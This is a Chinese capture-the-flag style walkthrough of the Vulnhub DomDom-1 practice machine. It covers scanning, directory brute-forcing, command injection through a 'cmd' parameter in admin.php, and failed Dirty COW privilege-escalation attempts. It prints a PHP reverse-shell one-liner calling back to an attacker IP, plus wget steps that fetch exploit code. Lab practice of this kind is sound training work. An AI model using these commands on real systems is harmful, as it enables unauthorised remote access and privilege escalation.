首页 > 其他分享 >Vulnhub DomDom-1(靶机玩乐2023-11-30)

Vulnhub DomDom-1(靶机玩乐2023-11-30)

时间:2023-11-30 18:11:42浏览次数:38  
标签:11 shell suggester 30 192.168 exploit DomDom https com

靶机下载地址:https://www.vulnhub.com/entry/domdom-1,328/

第一步:扫一下同网段接口IP:

 第二步:nmap扫描版本端口详细信息并输出

 

 第三步:访问80端口服务

 第四步:简单做做dirb目录遍历,也可以安装gobuster等做目录扫描:https://blog.csdn.net/qq_22597955/article/details/118553139

gobuster dir -u http://192.168.0.105 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php     

gobuster用法:https://blog.csdn.net/nzjdsds/article/details/86756828

 第五步:访问http://192.168.177.130/admin.php

 第六步:填写用户名、密码后通过 BurpSuite 抓取登录数据包,改成admin.php再看

发现 JavaScript 代码中可传递cmd参数

 添加&cmd=id

 第七步:反弹shell搞起来

反弹shell参考:https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet、
https://forum.ywhack.com/shell.php等

php -r '$sock=fsockopen("192.168.177.129",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

通过 PHP 执行经 URL 编码后的反弹shell命令;URL编码:https://tool.chinaz.com/tools/urlencode.aspx

 

 获取ttyshell(可回显),python3,bin/bash

 第八步:权限提升

方式1:审核是否存在内核漏洞:https://github.com/The-Z-Labs/linux-exploit-suggester

 

 通过 wget 下载 linux-exploit-suggester.sh 并赋予执行权限

wget http://192.168.177.129/linux-exploit-suggester.sh

chmod +x linux-exploit-suggester.sh

./linux-exploit-suggester.sh

ditycow提权(本地系统:https://www.exploit-db.com/download/40616;docker提:https://github.com/gebl/dirtycow-docker-vdso.git)

 wget http://192.168.177.129/40839

 

 dirtycow跟dirtycow2碰壁,大概率编译环境问题

 wget http://192.168.177.129/40839.c本地编译情况如下:

 虚拟机死机(下次试试本地编译dirtycow)

方式二

 

标签:11,shell,suggester,30,192.168,exploit,DomDom,https,com
From: https://www.cnblogs.com/justdoIT20680/p/17867961.html

相关文章

  • 《初学C语言第11天》
    ////求定积分-----------已给函数接口//#include<stdio.h>//#include<stdlib.h>//#include<math.h>//doublesquare(doublex)//平方//{//  returnx*x;//x^2//}//doublecube(doublex)//立方//{//  returnx*x*x;//x^3//}///*你编写的积分函数嵌入在这里开始*//......
  • P2522 [HAOI2011] Problem b
    题意求\(\sum_{i=a}^{b}\sum_{j=c}^{d}[\gcd(i,j)=k]\)。Sol简单容斥一下。\[\begin{aligned}\sum_{i=a}^{b}\sum_{j=c}^{d}[\gcd(i,j)=k]&=\sum_{i=1}^{b}\sum_{j=1}^{d}[\gcd(i,j)=k]\\&-\sum_{i=1}^{b......
  • Linux 内核参数调整解析:深度优化数据库性能 转载:https://www.toutiao.com/article/73
    系统内核参数配置文件:/etc/sysctl.conf一、参数说明1、关闭IPv6支持net.ipv6.conf.all.disable_ipv6=1net.ipv6.conf.default.disable_ipv6=1作用:关闭对IPv6的支持,减轻系统负担,提高安全性。解析:net.ipv6.conf.all.disable_ipv6:禁用系统中所有网络接口的IPv6。net......
  • Qt应用开发--国产工业开发板全志T113-i的部署教程
    Qt在工业上的使用场景包括工业自动化、嵌入式系统、汽车行业、航空航天、医疗设备、制造业和物联网应用。Qt被用来开发工业设备的用户界面、控制系统、嵌入式应用和其他工业应用,因其跨平台性和丰富的功能而备受青睐。Qt能够为工业领域带来什么好处:-Qt提供了强大的图形引擎,使开发......
  • 2023年11月更新整理Windows11专业版激活密钥
    微软Windows11官方ISO镜像下载地址:https://www.microsoft.com/zh-cn/software-download/windows11整理自互联网,不保证可用性。A2B7C-Q8D4E-F1G6H-I7J3K-L5M9NP9Q2R-E4S6T-U1V8W-O3X7Y-K5Z9JU6S2F-V4C6B-K1X8Z-M7N3K-G9H5JL8K2J-C3V6B-G1X9Z-Y7I4P-O5Q9RF9D2H-V3C6B-K1X8Z-M7N4K-U......
  • 11.30每日总结
    我要把今天作为我的纪念日,哈哈哈,零分选手一路逆袭最后拿了满分的故事,天呐,我要默默踩了多少狗屎才能积下这福泽,换来这美好的一天啊。体育老师怎么就这么面善呢,怎么“过了”这两个字从他嘴里说出来就这么好听呢。总之,现在11.30就是我的幸运日啦!......
  • HPM5301EVKlite windows下上手使用
    HPM5301是先辑半导体出的一款300Mhz的riscV芯片,售价7.99,开发板售价39.99,性价比超高资源获取evklite基本不需要原理图,下载SDK和ENV即可SDK连接:https://github.com/hpmicro/hpm_sdkENV连接:https://github.com/hpmicro/sdk_env占坑待续。。。......
  • Codeforces Round 911 (Div. 2)
    CodeforcesRound911(Div.2)基本情况A题秒了。B题条件没想明白,也不造点数据就无脑交,导致罚了不少时。B.LauraandOperations我先推出了,对于一个数,当另外两个数的个数之和为偶数时解可行,且这个数本身要能跟后面数替换。比如11223333就可以操作122333(1......
  • P2495 [SDOI2011] 消耗战
    题意给定一棵有边权的无根树。\(q\)次询问,每次询问\(k\)个点。求断边使得根节点\(1\)与\(k\)个点不连通的最小边权。Sol虚树。\(n^2\)dp是trivial的。考虑优化。注意到其中很多点都是无用的。考虑保留有效点。不难发现,有效点集为询问点两两\(lca\)的集合......
  • [20231124]奇怪的高逻辑读4.txt
    [20231124]奇怪的高逻辑读4.txt--//很长一段在生产系统看到一条逻辑读很高的sql语句,检查发现谓词使用了DBMS_LOB.SUBSTR函数.--//开发真奇葩,我无论如何也想不出开发为什么这些写代码,当时脑子短路了,使用trunc还好理解一点.--//我开始以为主要原因是lob类型导致fetch记录是1行1......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99